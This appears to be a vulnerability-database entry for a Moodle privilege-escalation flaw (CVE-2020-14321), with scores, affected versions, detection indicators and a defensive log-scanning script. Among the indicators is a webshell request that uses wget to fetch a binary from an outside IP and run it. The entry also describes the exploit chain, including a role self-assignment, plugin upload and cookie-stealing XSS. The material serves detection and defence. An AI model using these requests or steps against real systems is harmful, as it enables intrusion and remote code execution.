CVE-2020-14321
published 2022-08-16

CVE-2020-14321: In Moodle before 3.9.1, 3.8.4, 3.7.7 and 3.5.13, teachers of a course were able to assign themselves the manager role within that course.

Priority: P2 (69) · Severity: high · CVSS 3.1 base score: 8.8
Vector: AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Exploit: public PoC available
EPSS: 16.43% (96.6th percentile)

Affected (9 ranges)

Vendor   Product   Version range            Fixed in
moodle   moodle    -                        -
moodle   moodle    -                        -
moodle   moodle    >= 0 < 3.5.13            3.5.13
moodle   moodle    >= 3.5.0 < 3.5.13        3.5.13
moodle   moodle    >= 3.6.0-beta < 3.7.7    3.7.7
moodle   moodle    >= 3.7.0 < 3.7.7         3.7.7
moodle   moodle    >= 3.8.0 < 3.8.4         3.8.4
moodle   moodle    >= 3.8.0-beta < 3.8.4    3.8.4
moodle   moodle    >= 3.9.0-beta < 3.9.1    3.9.1

Detection & IOCs (extracted from sources)

url: http://10.10.94.67:9020/moodle/blocks/rce/lang/en/block_rce.php?cmd=ls
path: /blocks/rce/lang/en/block_rce.php
filename: block_rce.php
url: https://www.exploit-db.com/exploits/50180
url: https://github.com/HoangKien1020/CVE-2020-14321
url: /enrol/manual/ajax.php
url: /course/loginas.php
command: GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=wget+10.10.132.8%3a1234/client+%26%26+chmod+%2bx+client+%26%26+./client+%26 HTTP/1.1
  • The exploit chain requires a teacher-authenticated session. Initial access vector is privilege escalation via course enrollment: teacher assigns themselves manager role using /enrol/manual/ajax.php with roletoassign=1.
  • Detect POST/GET requests to /enrol/manual/ajax.php with parameter roletoassign=1 from a teacher-level session, which indicates privilege escalation attempt.
  • Detect access to /course/loginas.php — used by the exploit to impersonate a manager account after privilege escalation.
  • Detect POST to Moodle's role definition endpoint with action=edit&roleid=1 and a large capability list — this is the manager role modification step that enables plugin installation.
  • Detect HTTP requests to /blocks/rce/lang/en/block_rce.php with a cmd= query parameter — this is the webshell dropped by the malicious plugin.
  • XSS payload injected into MoodleNet Profile field to steal teacher session cookies; monitor for script tags or Image() src exfiltration patterns in profile update requests.
  • The exploit requires a Referer header matching the Moodle base URL; requests lacking a Referer header are rejected by some configurations. Detection should account for exploit scripts that add Referer headers.
  • Post-exploitation: attacker uploads a malicious plugin (rce.zip / block_rce) via Moodle's plugin install interface. Monitor for zip file uploads to Moodle admin plugin install endpoint followed by new PHP files appearing under /blocks/.
  • The exploit requires the attacker to already have a teacher-level authenticated session (credentials or valid MoodleSession cookie). Unauthenticated exploitation is not possible.
  • The exploit depends on a manager user existing in the course or being enrollable; the attacker must know or discover the manager's user ID (default assumed 25 in the PoC).
  • Affected Moodle versions: 3.9 (before 3.9.1), 3.8 to 3.8.3, 3.7 to 3.7.6, 3.5 to 3.5.12 and earlier unsupported versions.
  • The Metasploit module notes that manual cleanup is required after exploitation: enrolled students added to the course during the attack are not automatically removed.
  • The PoC script is sensitive to Moodle state; prior enumeration or interaction with the Moodle instance can break the exploit flow.
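A small log-scanning example, added here and not taken from the page's sources, that applies the request-level indicators above to web-server access logs and groups matches per client, so the stages of the chain coming from one source stand out. The log lines, IPs, course id and user id are constructed; the role-definition endpoint is matched on its parameters alone because the page does not name the path.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

LOG_RE = re.compile(  # Apache/nginx "combined" access-log format
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) \S+" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "[^"]*"$')

# Constructed sample lines: the IPs, course id (2) and user id (25) are made up.
SAMPLE_LOG = """\
203.0.113.5 - - [16/Aug/2022:10:00:01 +0000] "GET /moodle/course/view.php?id=2 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
203.0.113.5 - - [16/Aug/2022:10:00:09 +0000] "GET /moodle/enrol/manual/ajax.php?id=2&action=enrol&enrolid=3&userlist%5B%5D=25&roletoassign=1 HTTP/1.1" 200 44 "http://moodle.example/moodle/" "Mozilla/5.0"
203.0.113.5 - - [16/Aug/2022:10:00:15 +0000] "GET /moodle/course/loginas.php?id=2&user=25&sesskey=AbC123 HTTP/1.1" 303 0 "http://moodle.example/moodle/" "Mozilla/5.0"
203.0.113.5 - - [16/Aug/2022:10:02:40 +0000] "GET /moodle/blocks/rce/lang/en/block_rce.php?cmd=ls HTTP/1.1" 200 310 "-" "python-requests/2.28"
198.51.100.7 - - [16/Aug/2022:10:05:00 +0000] "GET /moodle/course/loginas.php?id=2&user=7 HTTP/1.1" 303 0 "http://moodle.example/moodle/" "Mozilla/5.0"
"""

def classify(target):
    """Map one request target to a stage of the chain described above, or None.
    Parameters of a real POST to ajax.php sit in the body, which ordinary access
    logs do not record; body logging or a WAF is needed to catch that variant."""
    parts = urlsplit(target)
    path = parts.path.lower()
    q = {k.lower(): [v.lower() for v in vs] for k, vs in parse_qs(parts.query, keep_blank_values=True).items()}
    if path.endswith("/enrol/manual/ajax.php") and "1" in q.get("roletoassign", []):
        return "self_assign_manager"
    if path.endswith("/course/loginas.php"):
        return "login_as"
    # The role-definition endpoint is not named on the page, so this matches on
    # parameters alone (assumption: action=edit&roleid=1 is distinctive enough).
    if q.get("action") == ["edit"] and q.get("roleid") == ["1"]:
        return "edit_manager_role"
    if path.endswith("/blocks/rce/lang/en/block_rce.php") and "cmd" in q:
        return "webshell"
    return None

def scan(log_text):
    """Return {client_ip: [stages in order of first appearance]}."""
    hits = defaultdict(list)
    for m in filter(None, map(LOG_RE.match, log_text.splitlines())):
        stage = classify(m["target"])
        if stage and stage not in hits[m["ip"]]:
            hits[m["ip"]].append(stage)
    return dict(hits)

def severity(stages):
    """One stage is a lead; two or more from the same client look like the chain."""
    if "webshell" in stages:
        return "critical"
    return "high" if len(stages) >= 2 else ("medium" if stages else "none")
```

A lone loginas.php hit is normal administrator activity, which is why it only rates "medium" until it is seen together with the enrolment or webshell stage from the same client.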

CVSS provenance

nvd: v3.1 8.8 HIGH CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
osv: 8.8 HIGH